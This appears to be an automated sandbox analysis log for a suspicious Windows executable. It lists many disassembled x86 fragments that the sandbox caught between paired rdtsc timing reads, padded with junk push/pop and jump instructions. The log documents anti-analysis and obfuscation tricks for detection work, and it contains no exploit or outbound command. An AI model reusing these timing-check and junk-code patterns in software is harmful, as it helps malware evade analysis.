                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8DAF0 second address: E8DAFF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4BA0D39708h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8DC62 second address: E8DC6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jno 00007F4BA0D3F156h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8DDF4 second address: E8DDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8DDF8 second address: E8DDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8E0C0 second address: E8E0DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39717h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8E0DD second address: E8E0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007F4BA0D3F156h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F4BA0D3F15Bh 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8E390 second address: E8E3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Fh 0x00000009 jmp 00007F4BA0D39717h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4BA0D39710h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E8E3CF second address: E8E3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E936D1 second address: E936E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F4BA0D39706h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E0DEC8 second address: E0DEF9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F4BA0D3F166h 0x00000019 js 00007F4BA0D3F156h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E0DEF9 second address: E0DEFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E93271 second address: E9329C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F4BA0D3F164h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E96057 second address: E9605B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9605B second address: E9605F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9B21A second address: E9B21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9B21F second address: E9B227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9B227 second address: E9B255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39713h 0x0000000d jmp 00007F4BA0D39713h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9B406 second address: E9B40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9B40C second address: E9B410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA14CB second address: EA14D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA14D7 second address: EA14DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA14DB second address: EA14F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F4BA0D3F156h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jno 00007F4BA0D3F156h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA14F7 second address: EA152C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39718h 0x00000008 jmp 00007F4BA0D39718h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA152C second address: EA1532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9FE34 second address: E9FE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9FE38 second address: E9FE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F4BA0D3F167h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9FFAF second address: E9FFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9FFB4 second address: E9FFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9FFBC second address: E9FFC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9FFC6 second address: E9FFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E9FFCA second address: E9FFCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56E49 second address: E56E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56E5B second address: E56EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39717h 0x00000008 jmp 00007F4BA0D39711h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F4BA0D39708h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jo 00007F4BA0D3970Ch 0x00000033 xor edi, 46E59F1Ah 0x00000039 mov dh, ch 0x0000003b mov ebx, dword ptr [ebp+12481EF8h] 0x00000041 add eax, ebx 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F4BA0D39708h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 00000018h 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d mov dword ptr [ebp+12467AE4h], edi 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F4BA0D3970Dh 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56EF6 second address: E56EFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E56EFB second address: E56F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F4BA0D39706h 0x00000010 js 00007F4BA0D39706h 0x00000016 popad 0x00000017 jnl 00007F4BA0D39708h 0x0000001d popad 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F4BA0D39708h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 push ebx 0x0000003a mov di, 3D32h 0x0000003e pop edx 0x0000003f sub edx, dword ptr [ebp+122D1E13h] 0x00000045 push 00000004h 0x00000047 mov edi, dword ptr [ebp+122D1F13h] 0x0000004d xor edx, 5DD72AF1h 0x00000053 nop 0x00000054 jmp 00007F4BA0D39713h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F4BA0D39713h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA06A2 second address: EA06A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA06A6 second address: EA06AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA06AC second address: EA06E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F160h 0x00000007 jnc 00007F4BA0D3F163h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F4BA0D3F162h 0x00000017 jnc 00007F4BA0D3F156h 0x0000001d jl 00007F4BA0D3F156h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA4392 second address: EA43CB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4BA0D39706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4BA0D3970Bh 0x0000000f jp 00007F4BA0D3971Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EA40CC second address: EA40D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAA22A second address: EAA22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAA22F second address: EAA253 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4BA0D3F164h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAA253 second address: EAA25D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAAB69 second address: EAAB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAAB6D second address: EAAB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39711h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAAB86 second address: EAAB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAAB8A second address: EAAB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAB16C second address: EAB198 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4BA0D3F164h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4BA0D3F160h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAB198 second address: EAB19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD28 second address: EABD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD2E second address: EABD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD32 second address: EABD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD36 second address: EABD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD3F second address: EABD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ah 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F4BA0D3F156h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4EC7 second address: EB4EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39718h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4EE3 second address: EB4EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4EE9 second address: EB4F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4BA0D3970Eh 0x0000000c jno 00007F4BA0D39706h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jg 00007F4BA0D39706h 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4F0A second address: EB4F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4F16 second address: EB4F2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB50AF second address: EB50BE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB50BE second address: EB50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 ja 00007F4BA0D39708h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBFB6F second address: EBFB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F4BA0D3F156h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBFB7E second address: EBFB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBFE17 second address: EBFE25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC04ED second address: EC04F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC04F1 second address: EC04F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC12F5 second address: EC1321 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4BA0D39726h 0x00000008 jmp 00007F4BA0D3970Dh 0x0000000d jmp 00007F4BA0D39713h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC1321 second address: EC1327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBF2F6 second address: EBF305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F4BA0D39706h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBF305 second address: EBF30B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBF30B second address: EBF311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC685B second address: EC686C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC6B1D second address: EC6B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F4BA0D39706h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC6B2D second address: EC6B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10D2 second address: ED10D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10D6 second address: ED10DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10DA second address: ED10EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D3970Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10EF second address: ED10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10F3 second address: ED1109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED1109 second address: ED110F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED2BE2 second address: ED2BE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED2BE7 second address: ED2BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 js 00007F4BA0D3F15Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED2D3B second address: ED2D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39714h 0x00000008 jnc 00007F4BA0D39706h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED534C second address: ED5352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED5352 second address: ED5356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED54CE second address: ED54DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F4BA0D3F156h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED54DB second address: ED54E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED54E5 second address: ED54F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F4BA0D3F15Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED9D18 second address: ED9D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007F4BA0D3970Ch 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
